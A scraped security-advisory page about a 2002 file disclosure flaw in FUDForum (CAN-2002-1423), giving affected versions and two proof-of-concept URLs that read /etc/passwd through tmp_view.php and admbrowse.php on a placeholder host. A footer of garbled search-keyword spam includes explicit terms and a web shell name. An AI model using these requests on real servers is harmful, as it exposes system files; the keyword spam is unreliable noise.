about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Ilia Alshanetsky FUDForum File Disclosure Vulnerability


Title Ilia Alshanetsky FUDForum File Disclosure Vulnerability
Published 2002-08-19-12:00AM
Updated 2002-08-19-10:39PM
Class Design Error
CVE   CAN-2002-1423
Remote  Yes
Local  No
Credit  Discovery credited to Ulf Harnhammar <ulfh@update.uu.se>.
Vulnerable  Ilia Alshanetsky FUDForum 2.0.2
Ilia Alshanetsky FUDForum 1.9.8
Ilia Alshanetsky FUDForum 1.2.8
Not Vulnerable  Ilia Alshanetsky FUDForum 2.2.3
Ilia Alshanetsky FUDForum 2.2 .0
Code   There is no exploit code required. The following proof of concept was provided by Ulf Harnhammar <ulfh@update.uu.se>:

http://victimhost.com/tmp_view.php?file=/etc/passwd
http://victimhost.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 21 Nov 2008 06:05:57 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Tsunade se linux remo 200 /compo Nonton fil ghvgygy hpg.online gay mature ms01 halo 2 sexey wall www.events KARINA KAP shell r57. xxx-deflor qmaill tamilheroi Photo sex t501t girls sex Sexbome www.tamilf picha za n Charmi www.artisb devayanise windows xp SIXY PICTU Sex-photo. www.dhakas 200 /compo Linux 2.4. SAXY PHOTO t239t dogfucking Wap.trisha Www.fatmam SMARTMOVIE Indian xxx www.18sex OLD SEX VI 200 /compo staff sele sex hymen asp shoppi Indianposi Sexy web 200 /compo burning bo IceWarp We support tr